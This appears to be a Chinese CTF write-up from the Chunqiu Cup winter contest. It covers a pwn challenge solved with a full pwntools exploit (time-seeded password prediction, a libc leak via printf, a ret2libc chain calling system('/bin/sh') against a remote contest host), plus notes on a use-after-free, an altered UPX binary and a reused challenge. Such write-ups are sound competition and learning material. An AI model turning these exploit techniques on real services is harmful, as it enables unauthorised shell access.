春秋杯冬季赛wp
pwn
好菜,pwn就出了一个题,堆题做不出
nmanager
可以用printf %s泄露libc的地址,然后打ret2libc,n为8刚刚好到rbp那
unsigned __int64 __fastcall modify(__int64 a1)
{
char buf[24]; // [rsp+10h] [rbp-20h] BYREF
unsigned __int64 v3; // [rsp+28h] [rbp-8h]
v3 = __readfsqword(0x28u);
do
{
puts("## select the idx you want modify ##");
__isoc99_scanf("%d", &n);
printf("gender: ");
read(0, (void *)(120LL * n + a1), 0x20uLL);
printf("age: ");
__isoc99_scanf("%lld", 120LL * n + a1 + 32);
printf("name: ");
read(0, (void *)(120LL * n + a1 + 40), 0x40uLL);
printf(
"[idx%d]:\nname: %s\nage: %lld\ngender: %s\n",
(unsigned int)n,
(const char *)(120LL * n + a1 + 40),
*(_QWORD *)(120LL * n + a1 + 32),
(const char *)(120LL * n + a1));
puts("quit now?(Y/y)");
read(0, buf, 3uLL);
}
while ( buf[0] != 121 && buf[0] != 89 );
return v3 - __readfsqword(0x28u);
}exp
from pwn import *
from LibcSearcher import *
import ctypes
context(os='linux',arch='amd64',log_level='debug')
elf = context.binary = ELF('./nmanager')
libc = elf.libc
is_debug = 0
if(is_debug):
p = process()
else:
ip = "8.147.131.194"
port = 43635
p = remote(ip,port)
# gdb.attach(p)
g = lambda x: gdb.attach(x)
# send() sendline() sendafter() sendlineafter()
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)
# recv() recvline() recvuntil()
r = lambda x = None: p.recv() if x is None else p.recv(x)
rl = lambda : p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda : u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
r_leak_libc_32 = lambda : u32(p.recvuntil(b'\xf7')[-4:])
ru(" ######################################################\n")
libc = ctypes.CDLL(None)
libc.srand(int(time.time()))
rand_result = libc.rand()
characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
password = characters[rand_result % 62]
ru("input password: ")
sl(password)
bss = 0x404000
ret = 0x000000000040101a
leave_ret = 0x40157f
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
check = 0x401585
printf = 0x4014F3
sla("## select the idx you want modify ##\n","8")
sa("gender: ","AAAAAAAA")
sla("age: ","123")
sa("name: ","nyyyddddn")
ru("AAAAAAAA")
libc_base = u64(r(6).ljust(8,b'\x00')) - 0x29d90
success(f"{hex(libc_base)}")
libc = elf.libc
rdi = libc_base + 0x000000000002a3e5
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
sa("quit now?(Y/y)\n","n")
sla("## select the idx you want modify ##\n","8")
payload = flat([
bss,ret,rdi,binsh
])
sa("gender: ",payload)
sla("age: ",str(system))
sa("name: ","nyyyddddn")
# g(p)
sa("quit now?(Y/y)\n","y")
p.interactive()
book[未解决]
delete存在一个uaf
void delete()
{
unsigned int v0; // [rsp+4h] [rbp-Ch]
printf("Index:");
v0 = my_read();
free(*((void **)&heap + v0));
}如果没有pie的话,可以用size写地址,show去泄露,edit实现任意地址写,写got或者fini,打one_gadget的,可是有pie,咱太菜了,还不会做堆题
int show()
{
int v1; // [rsp+4h] [rbp-Ch]
printf("Index:");
v1 = my_read();
return puts((const char *)heap[v1]);
}_QWORD *add()
{
void *v0; // rcx
_QWORD *result; // rax
int v2; // [rsp+0h] [rbp-10h]
int v3; // [rsp+4h] [rbp-Ch]
printf("Index:");
v2 = my_read();
printf("what size :");
v3 = my_read();
chunk[v2] = v3;
v0 = malloc(v3);
result = heap;
heap[v2] = v0;
return result;
}re
upx2023[未解决]
不太清楚是魔改了什么的upx,区段还有upx大多数特征都是正常的?x64dbg打内存断点找oep脱壳,走到这附件就是oep了,scylla也能搜到导入表
一个随机数异或的逻辑? ida下断点断不住,好奇怪,调了半天没搞清楚cmp的逻辑
可信计算
搜了一下发现是ciscn2022的原题,容器甚至一模一样,flag_server下的flag甚至可以直接cat查看
在/root/cube-shell/instance/flag_server 下有个flag list,直接cat就能拿到题目1 和 2 的flag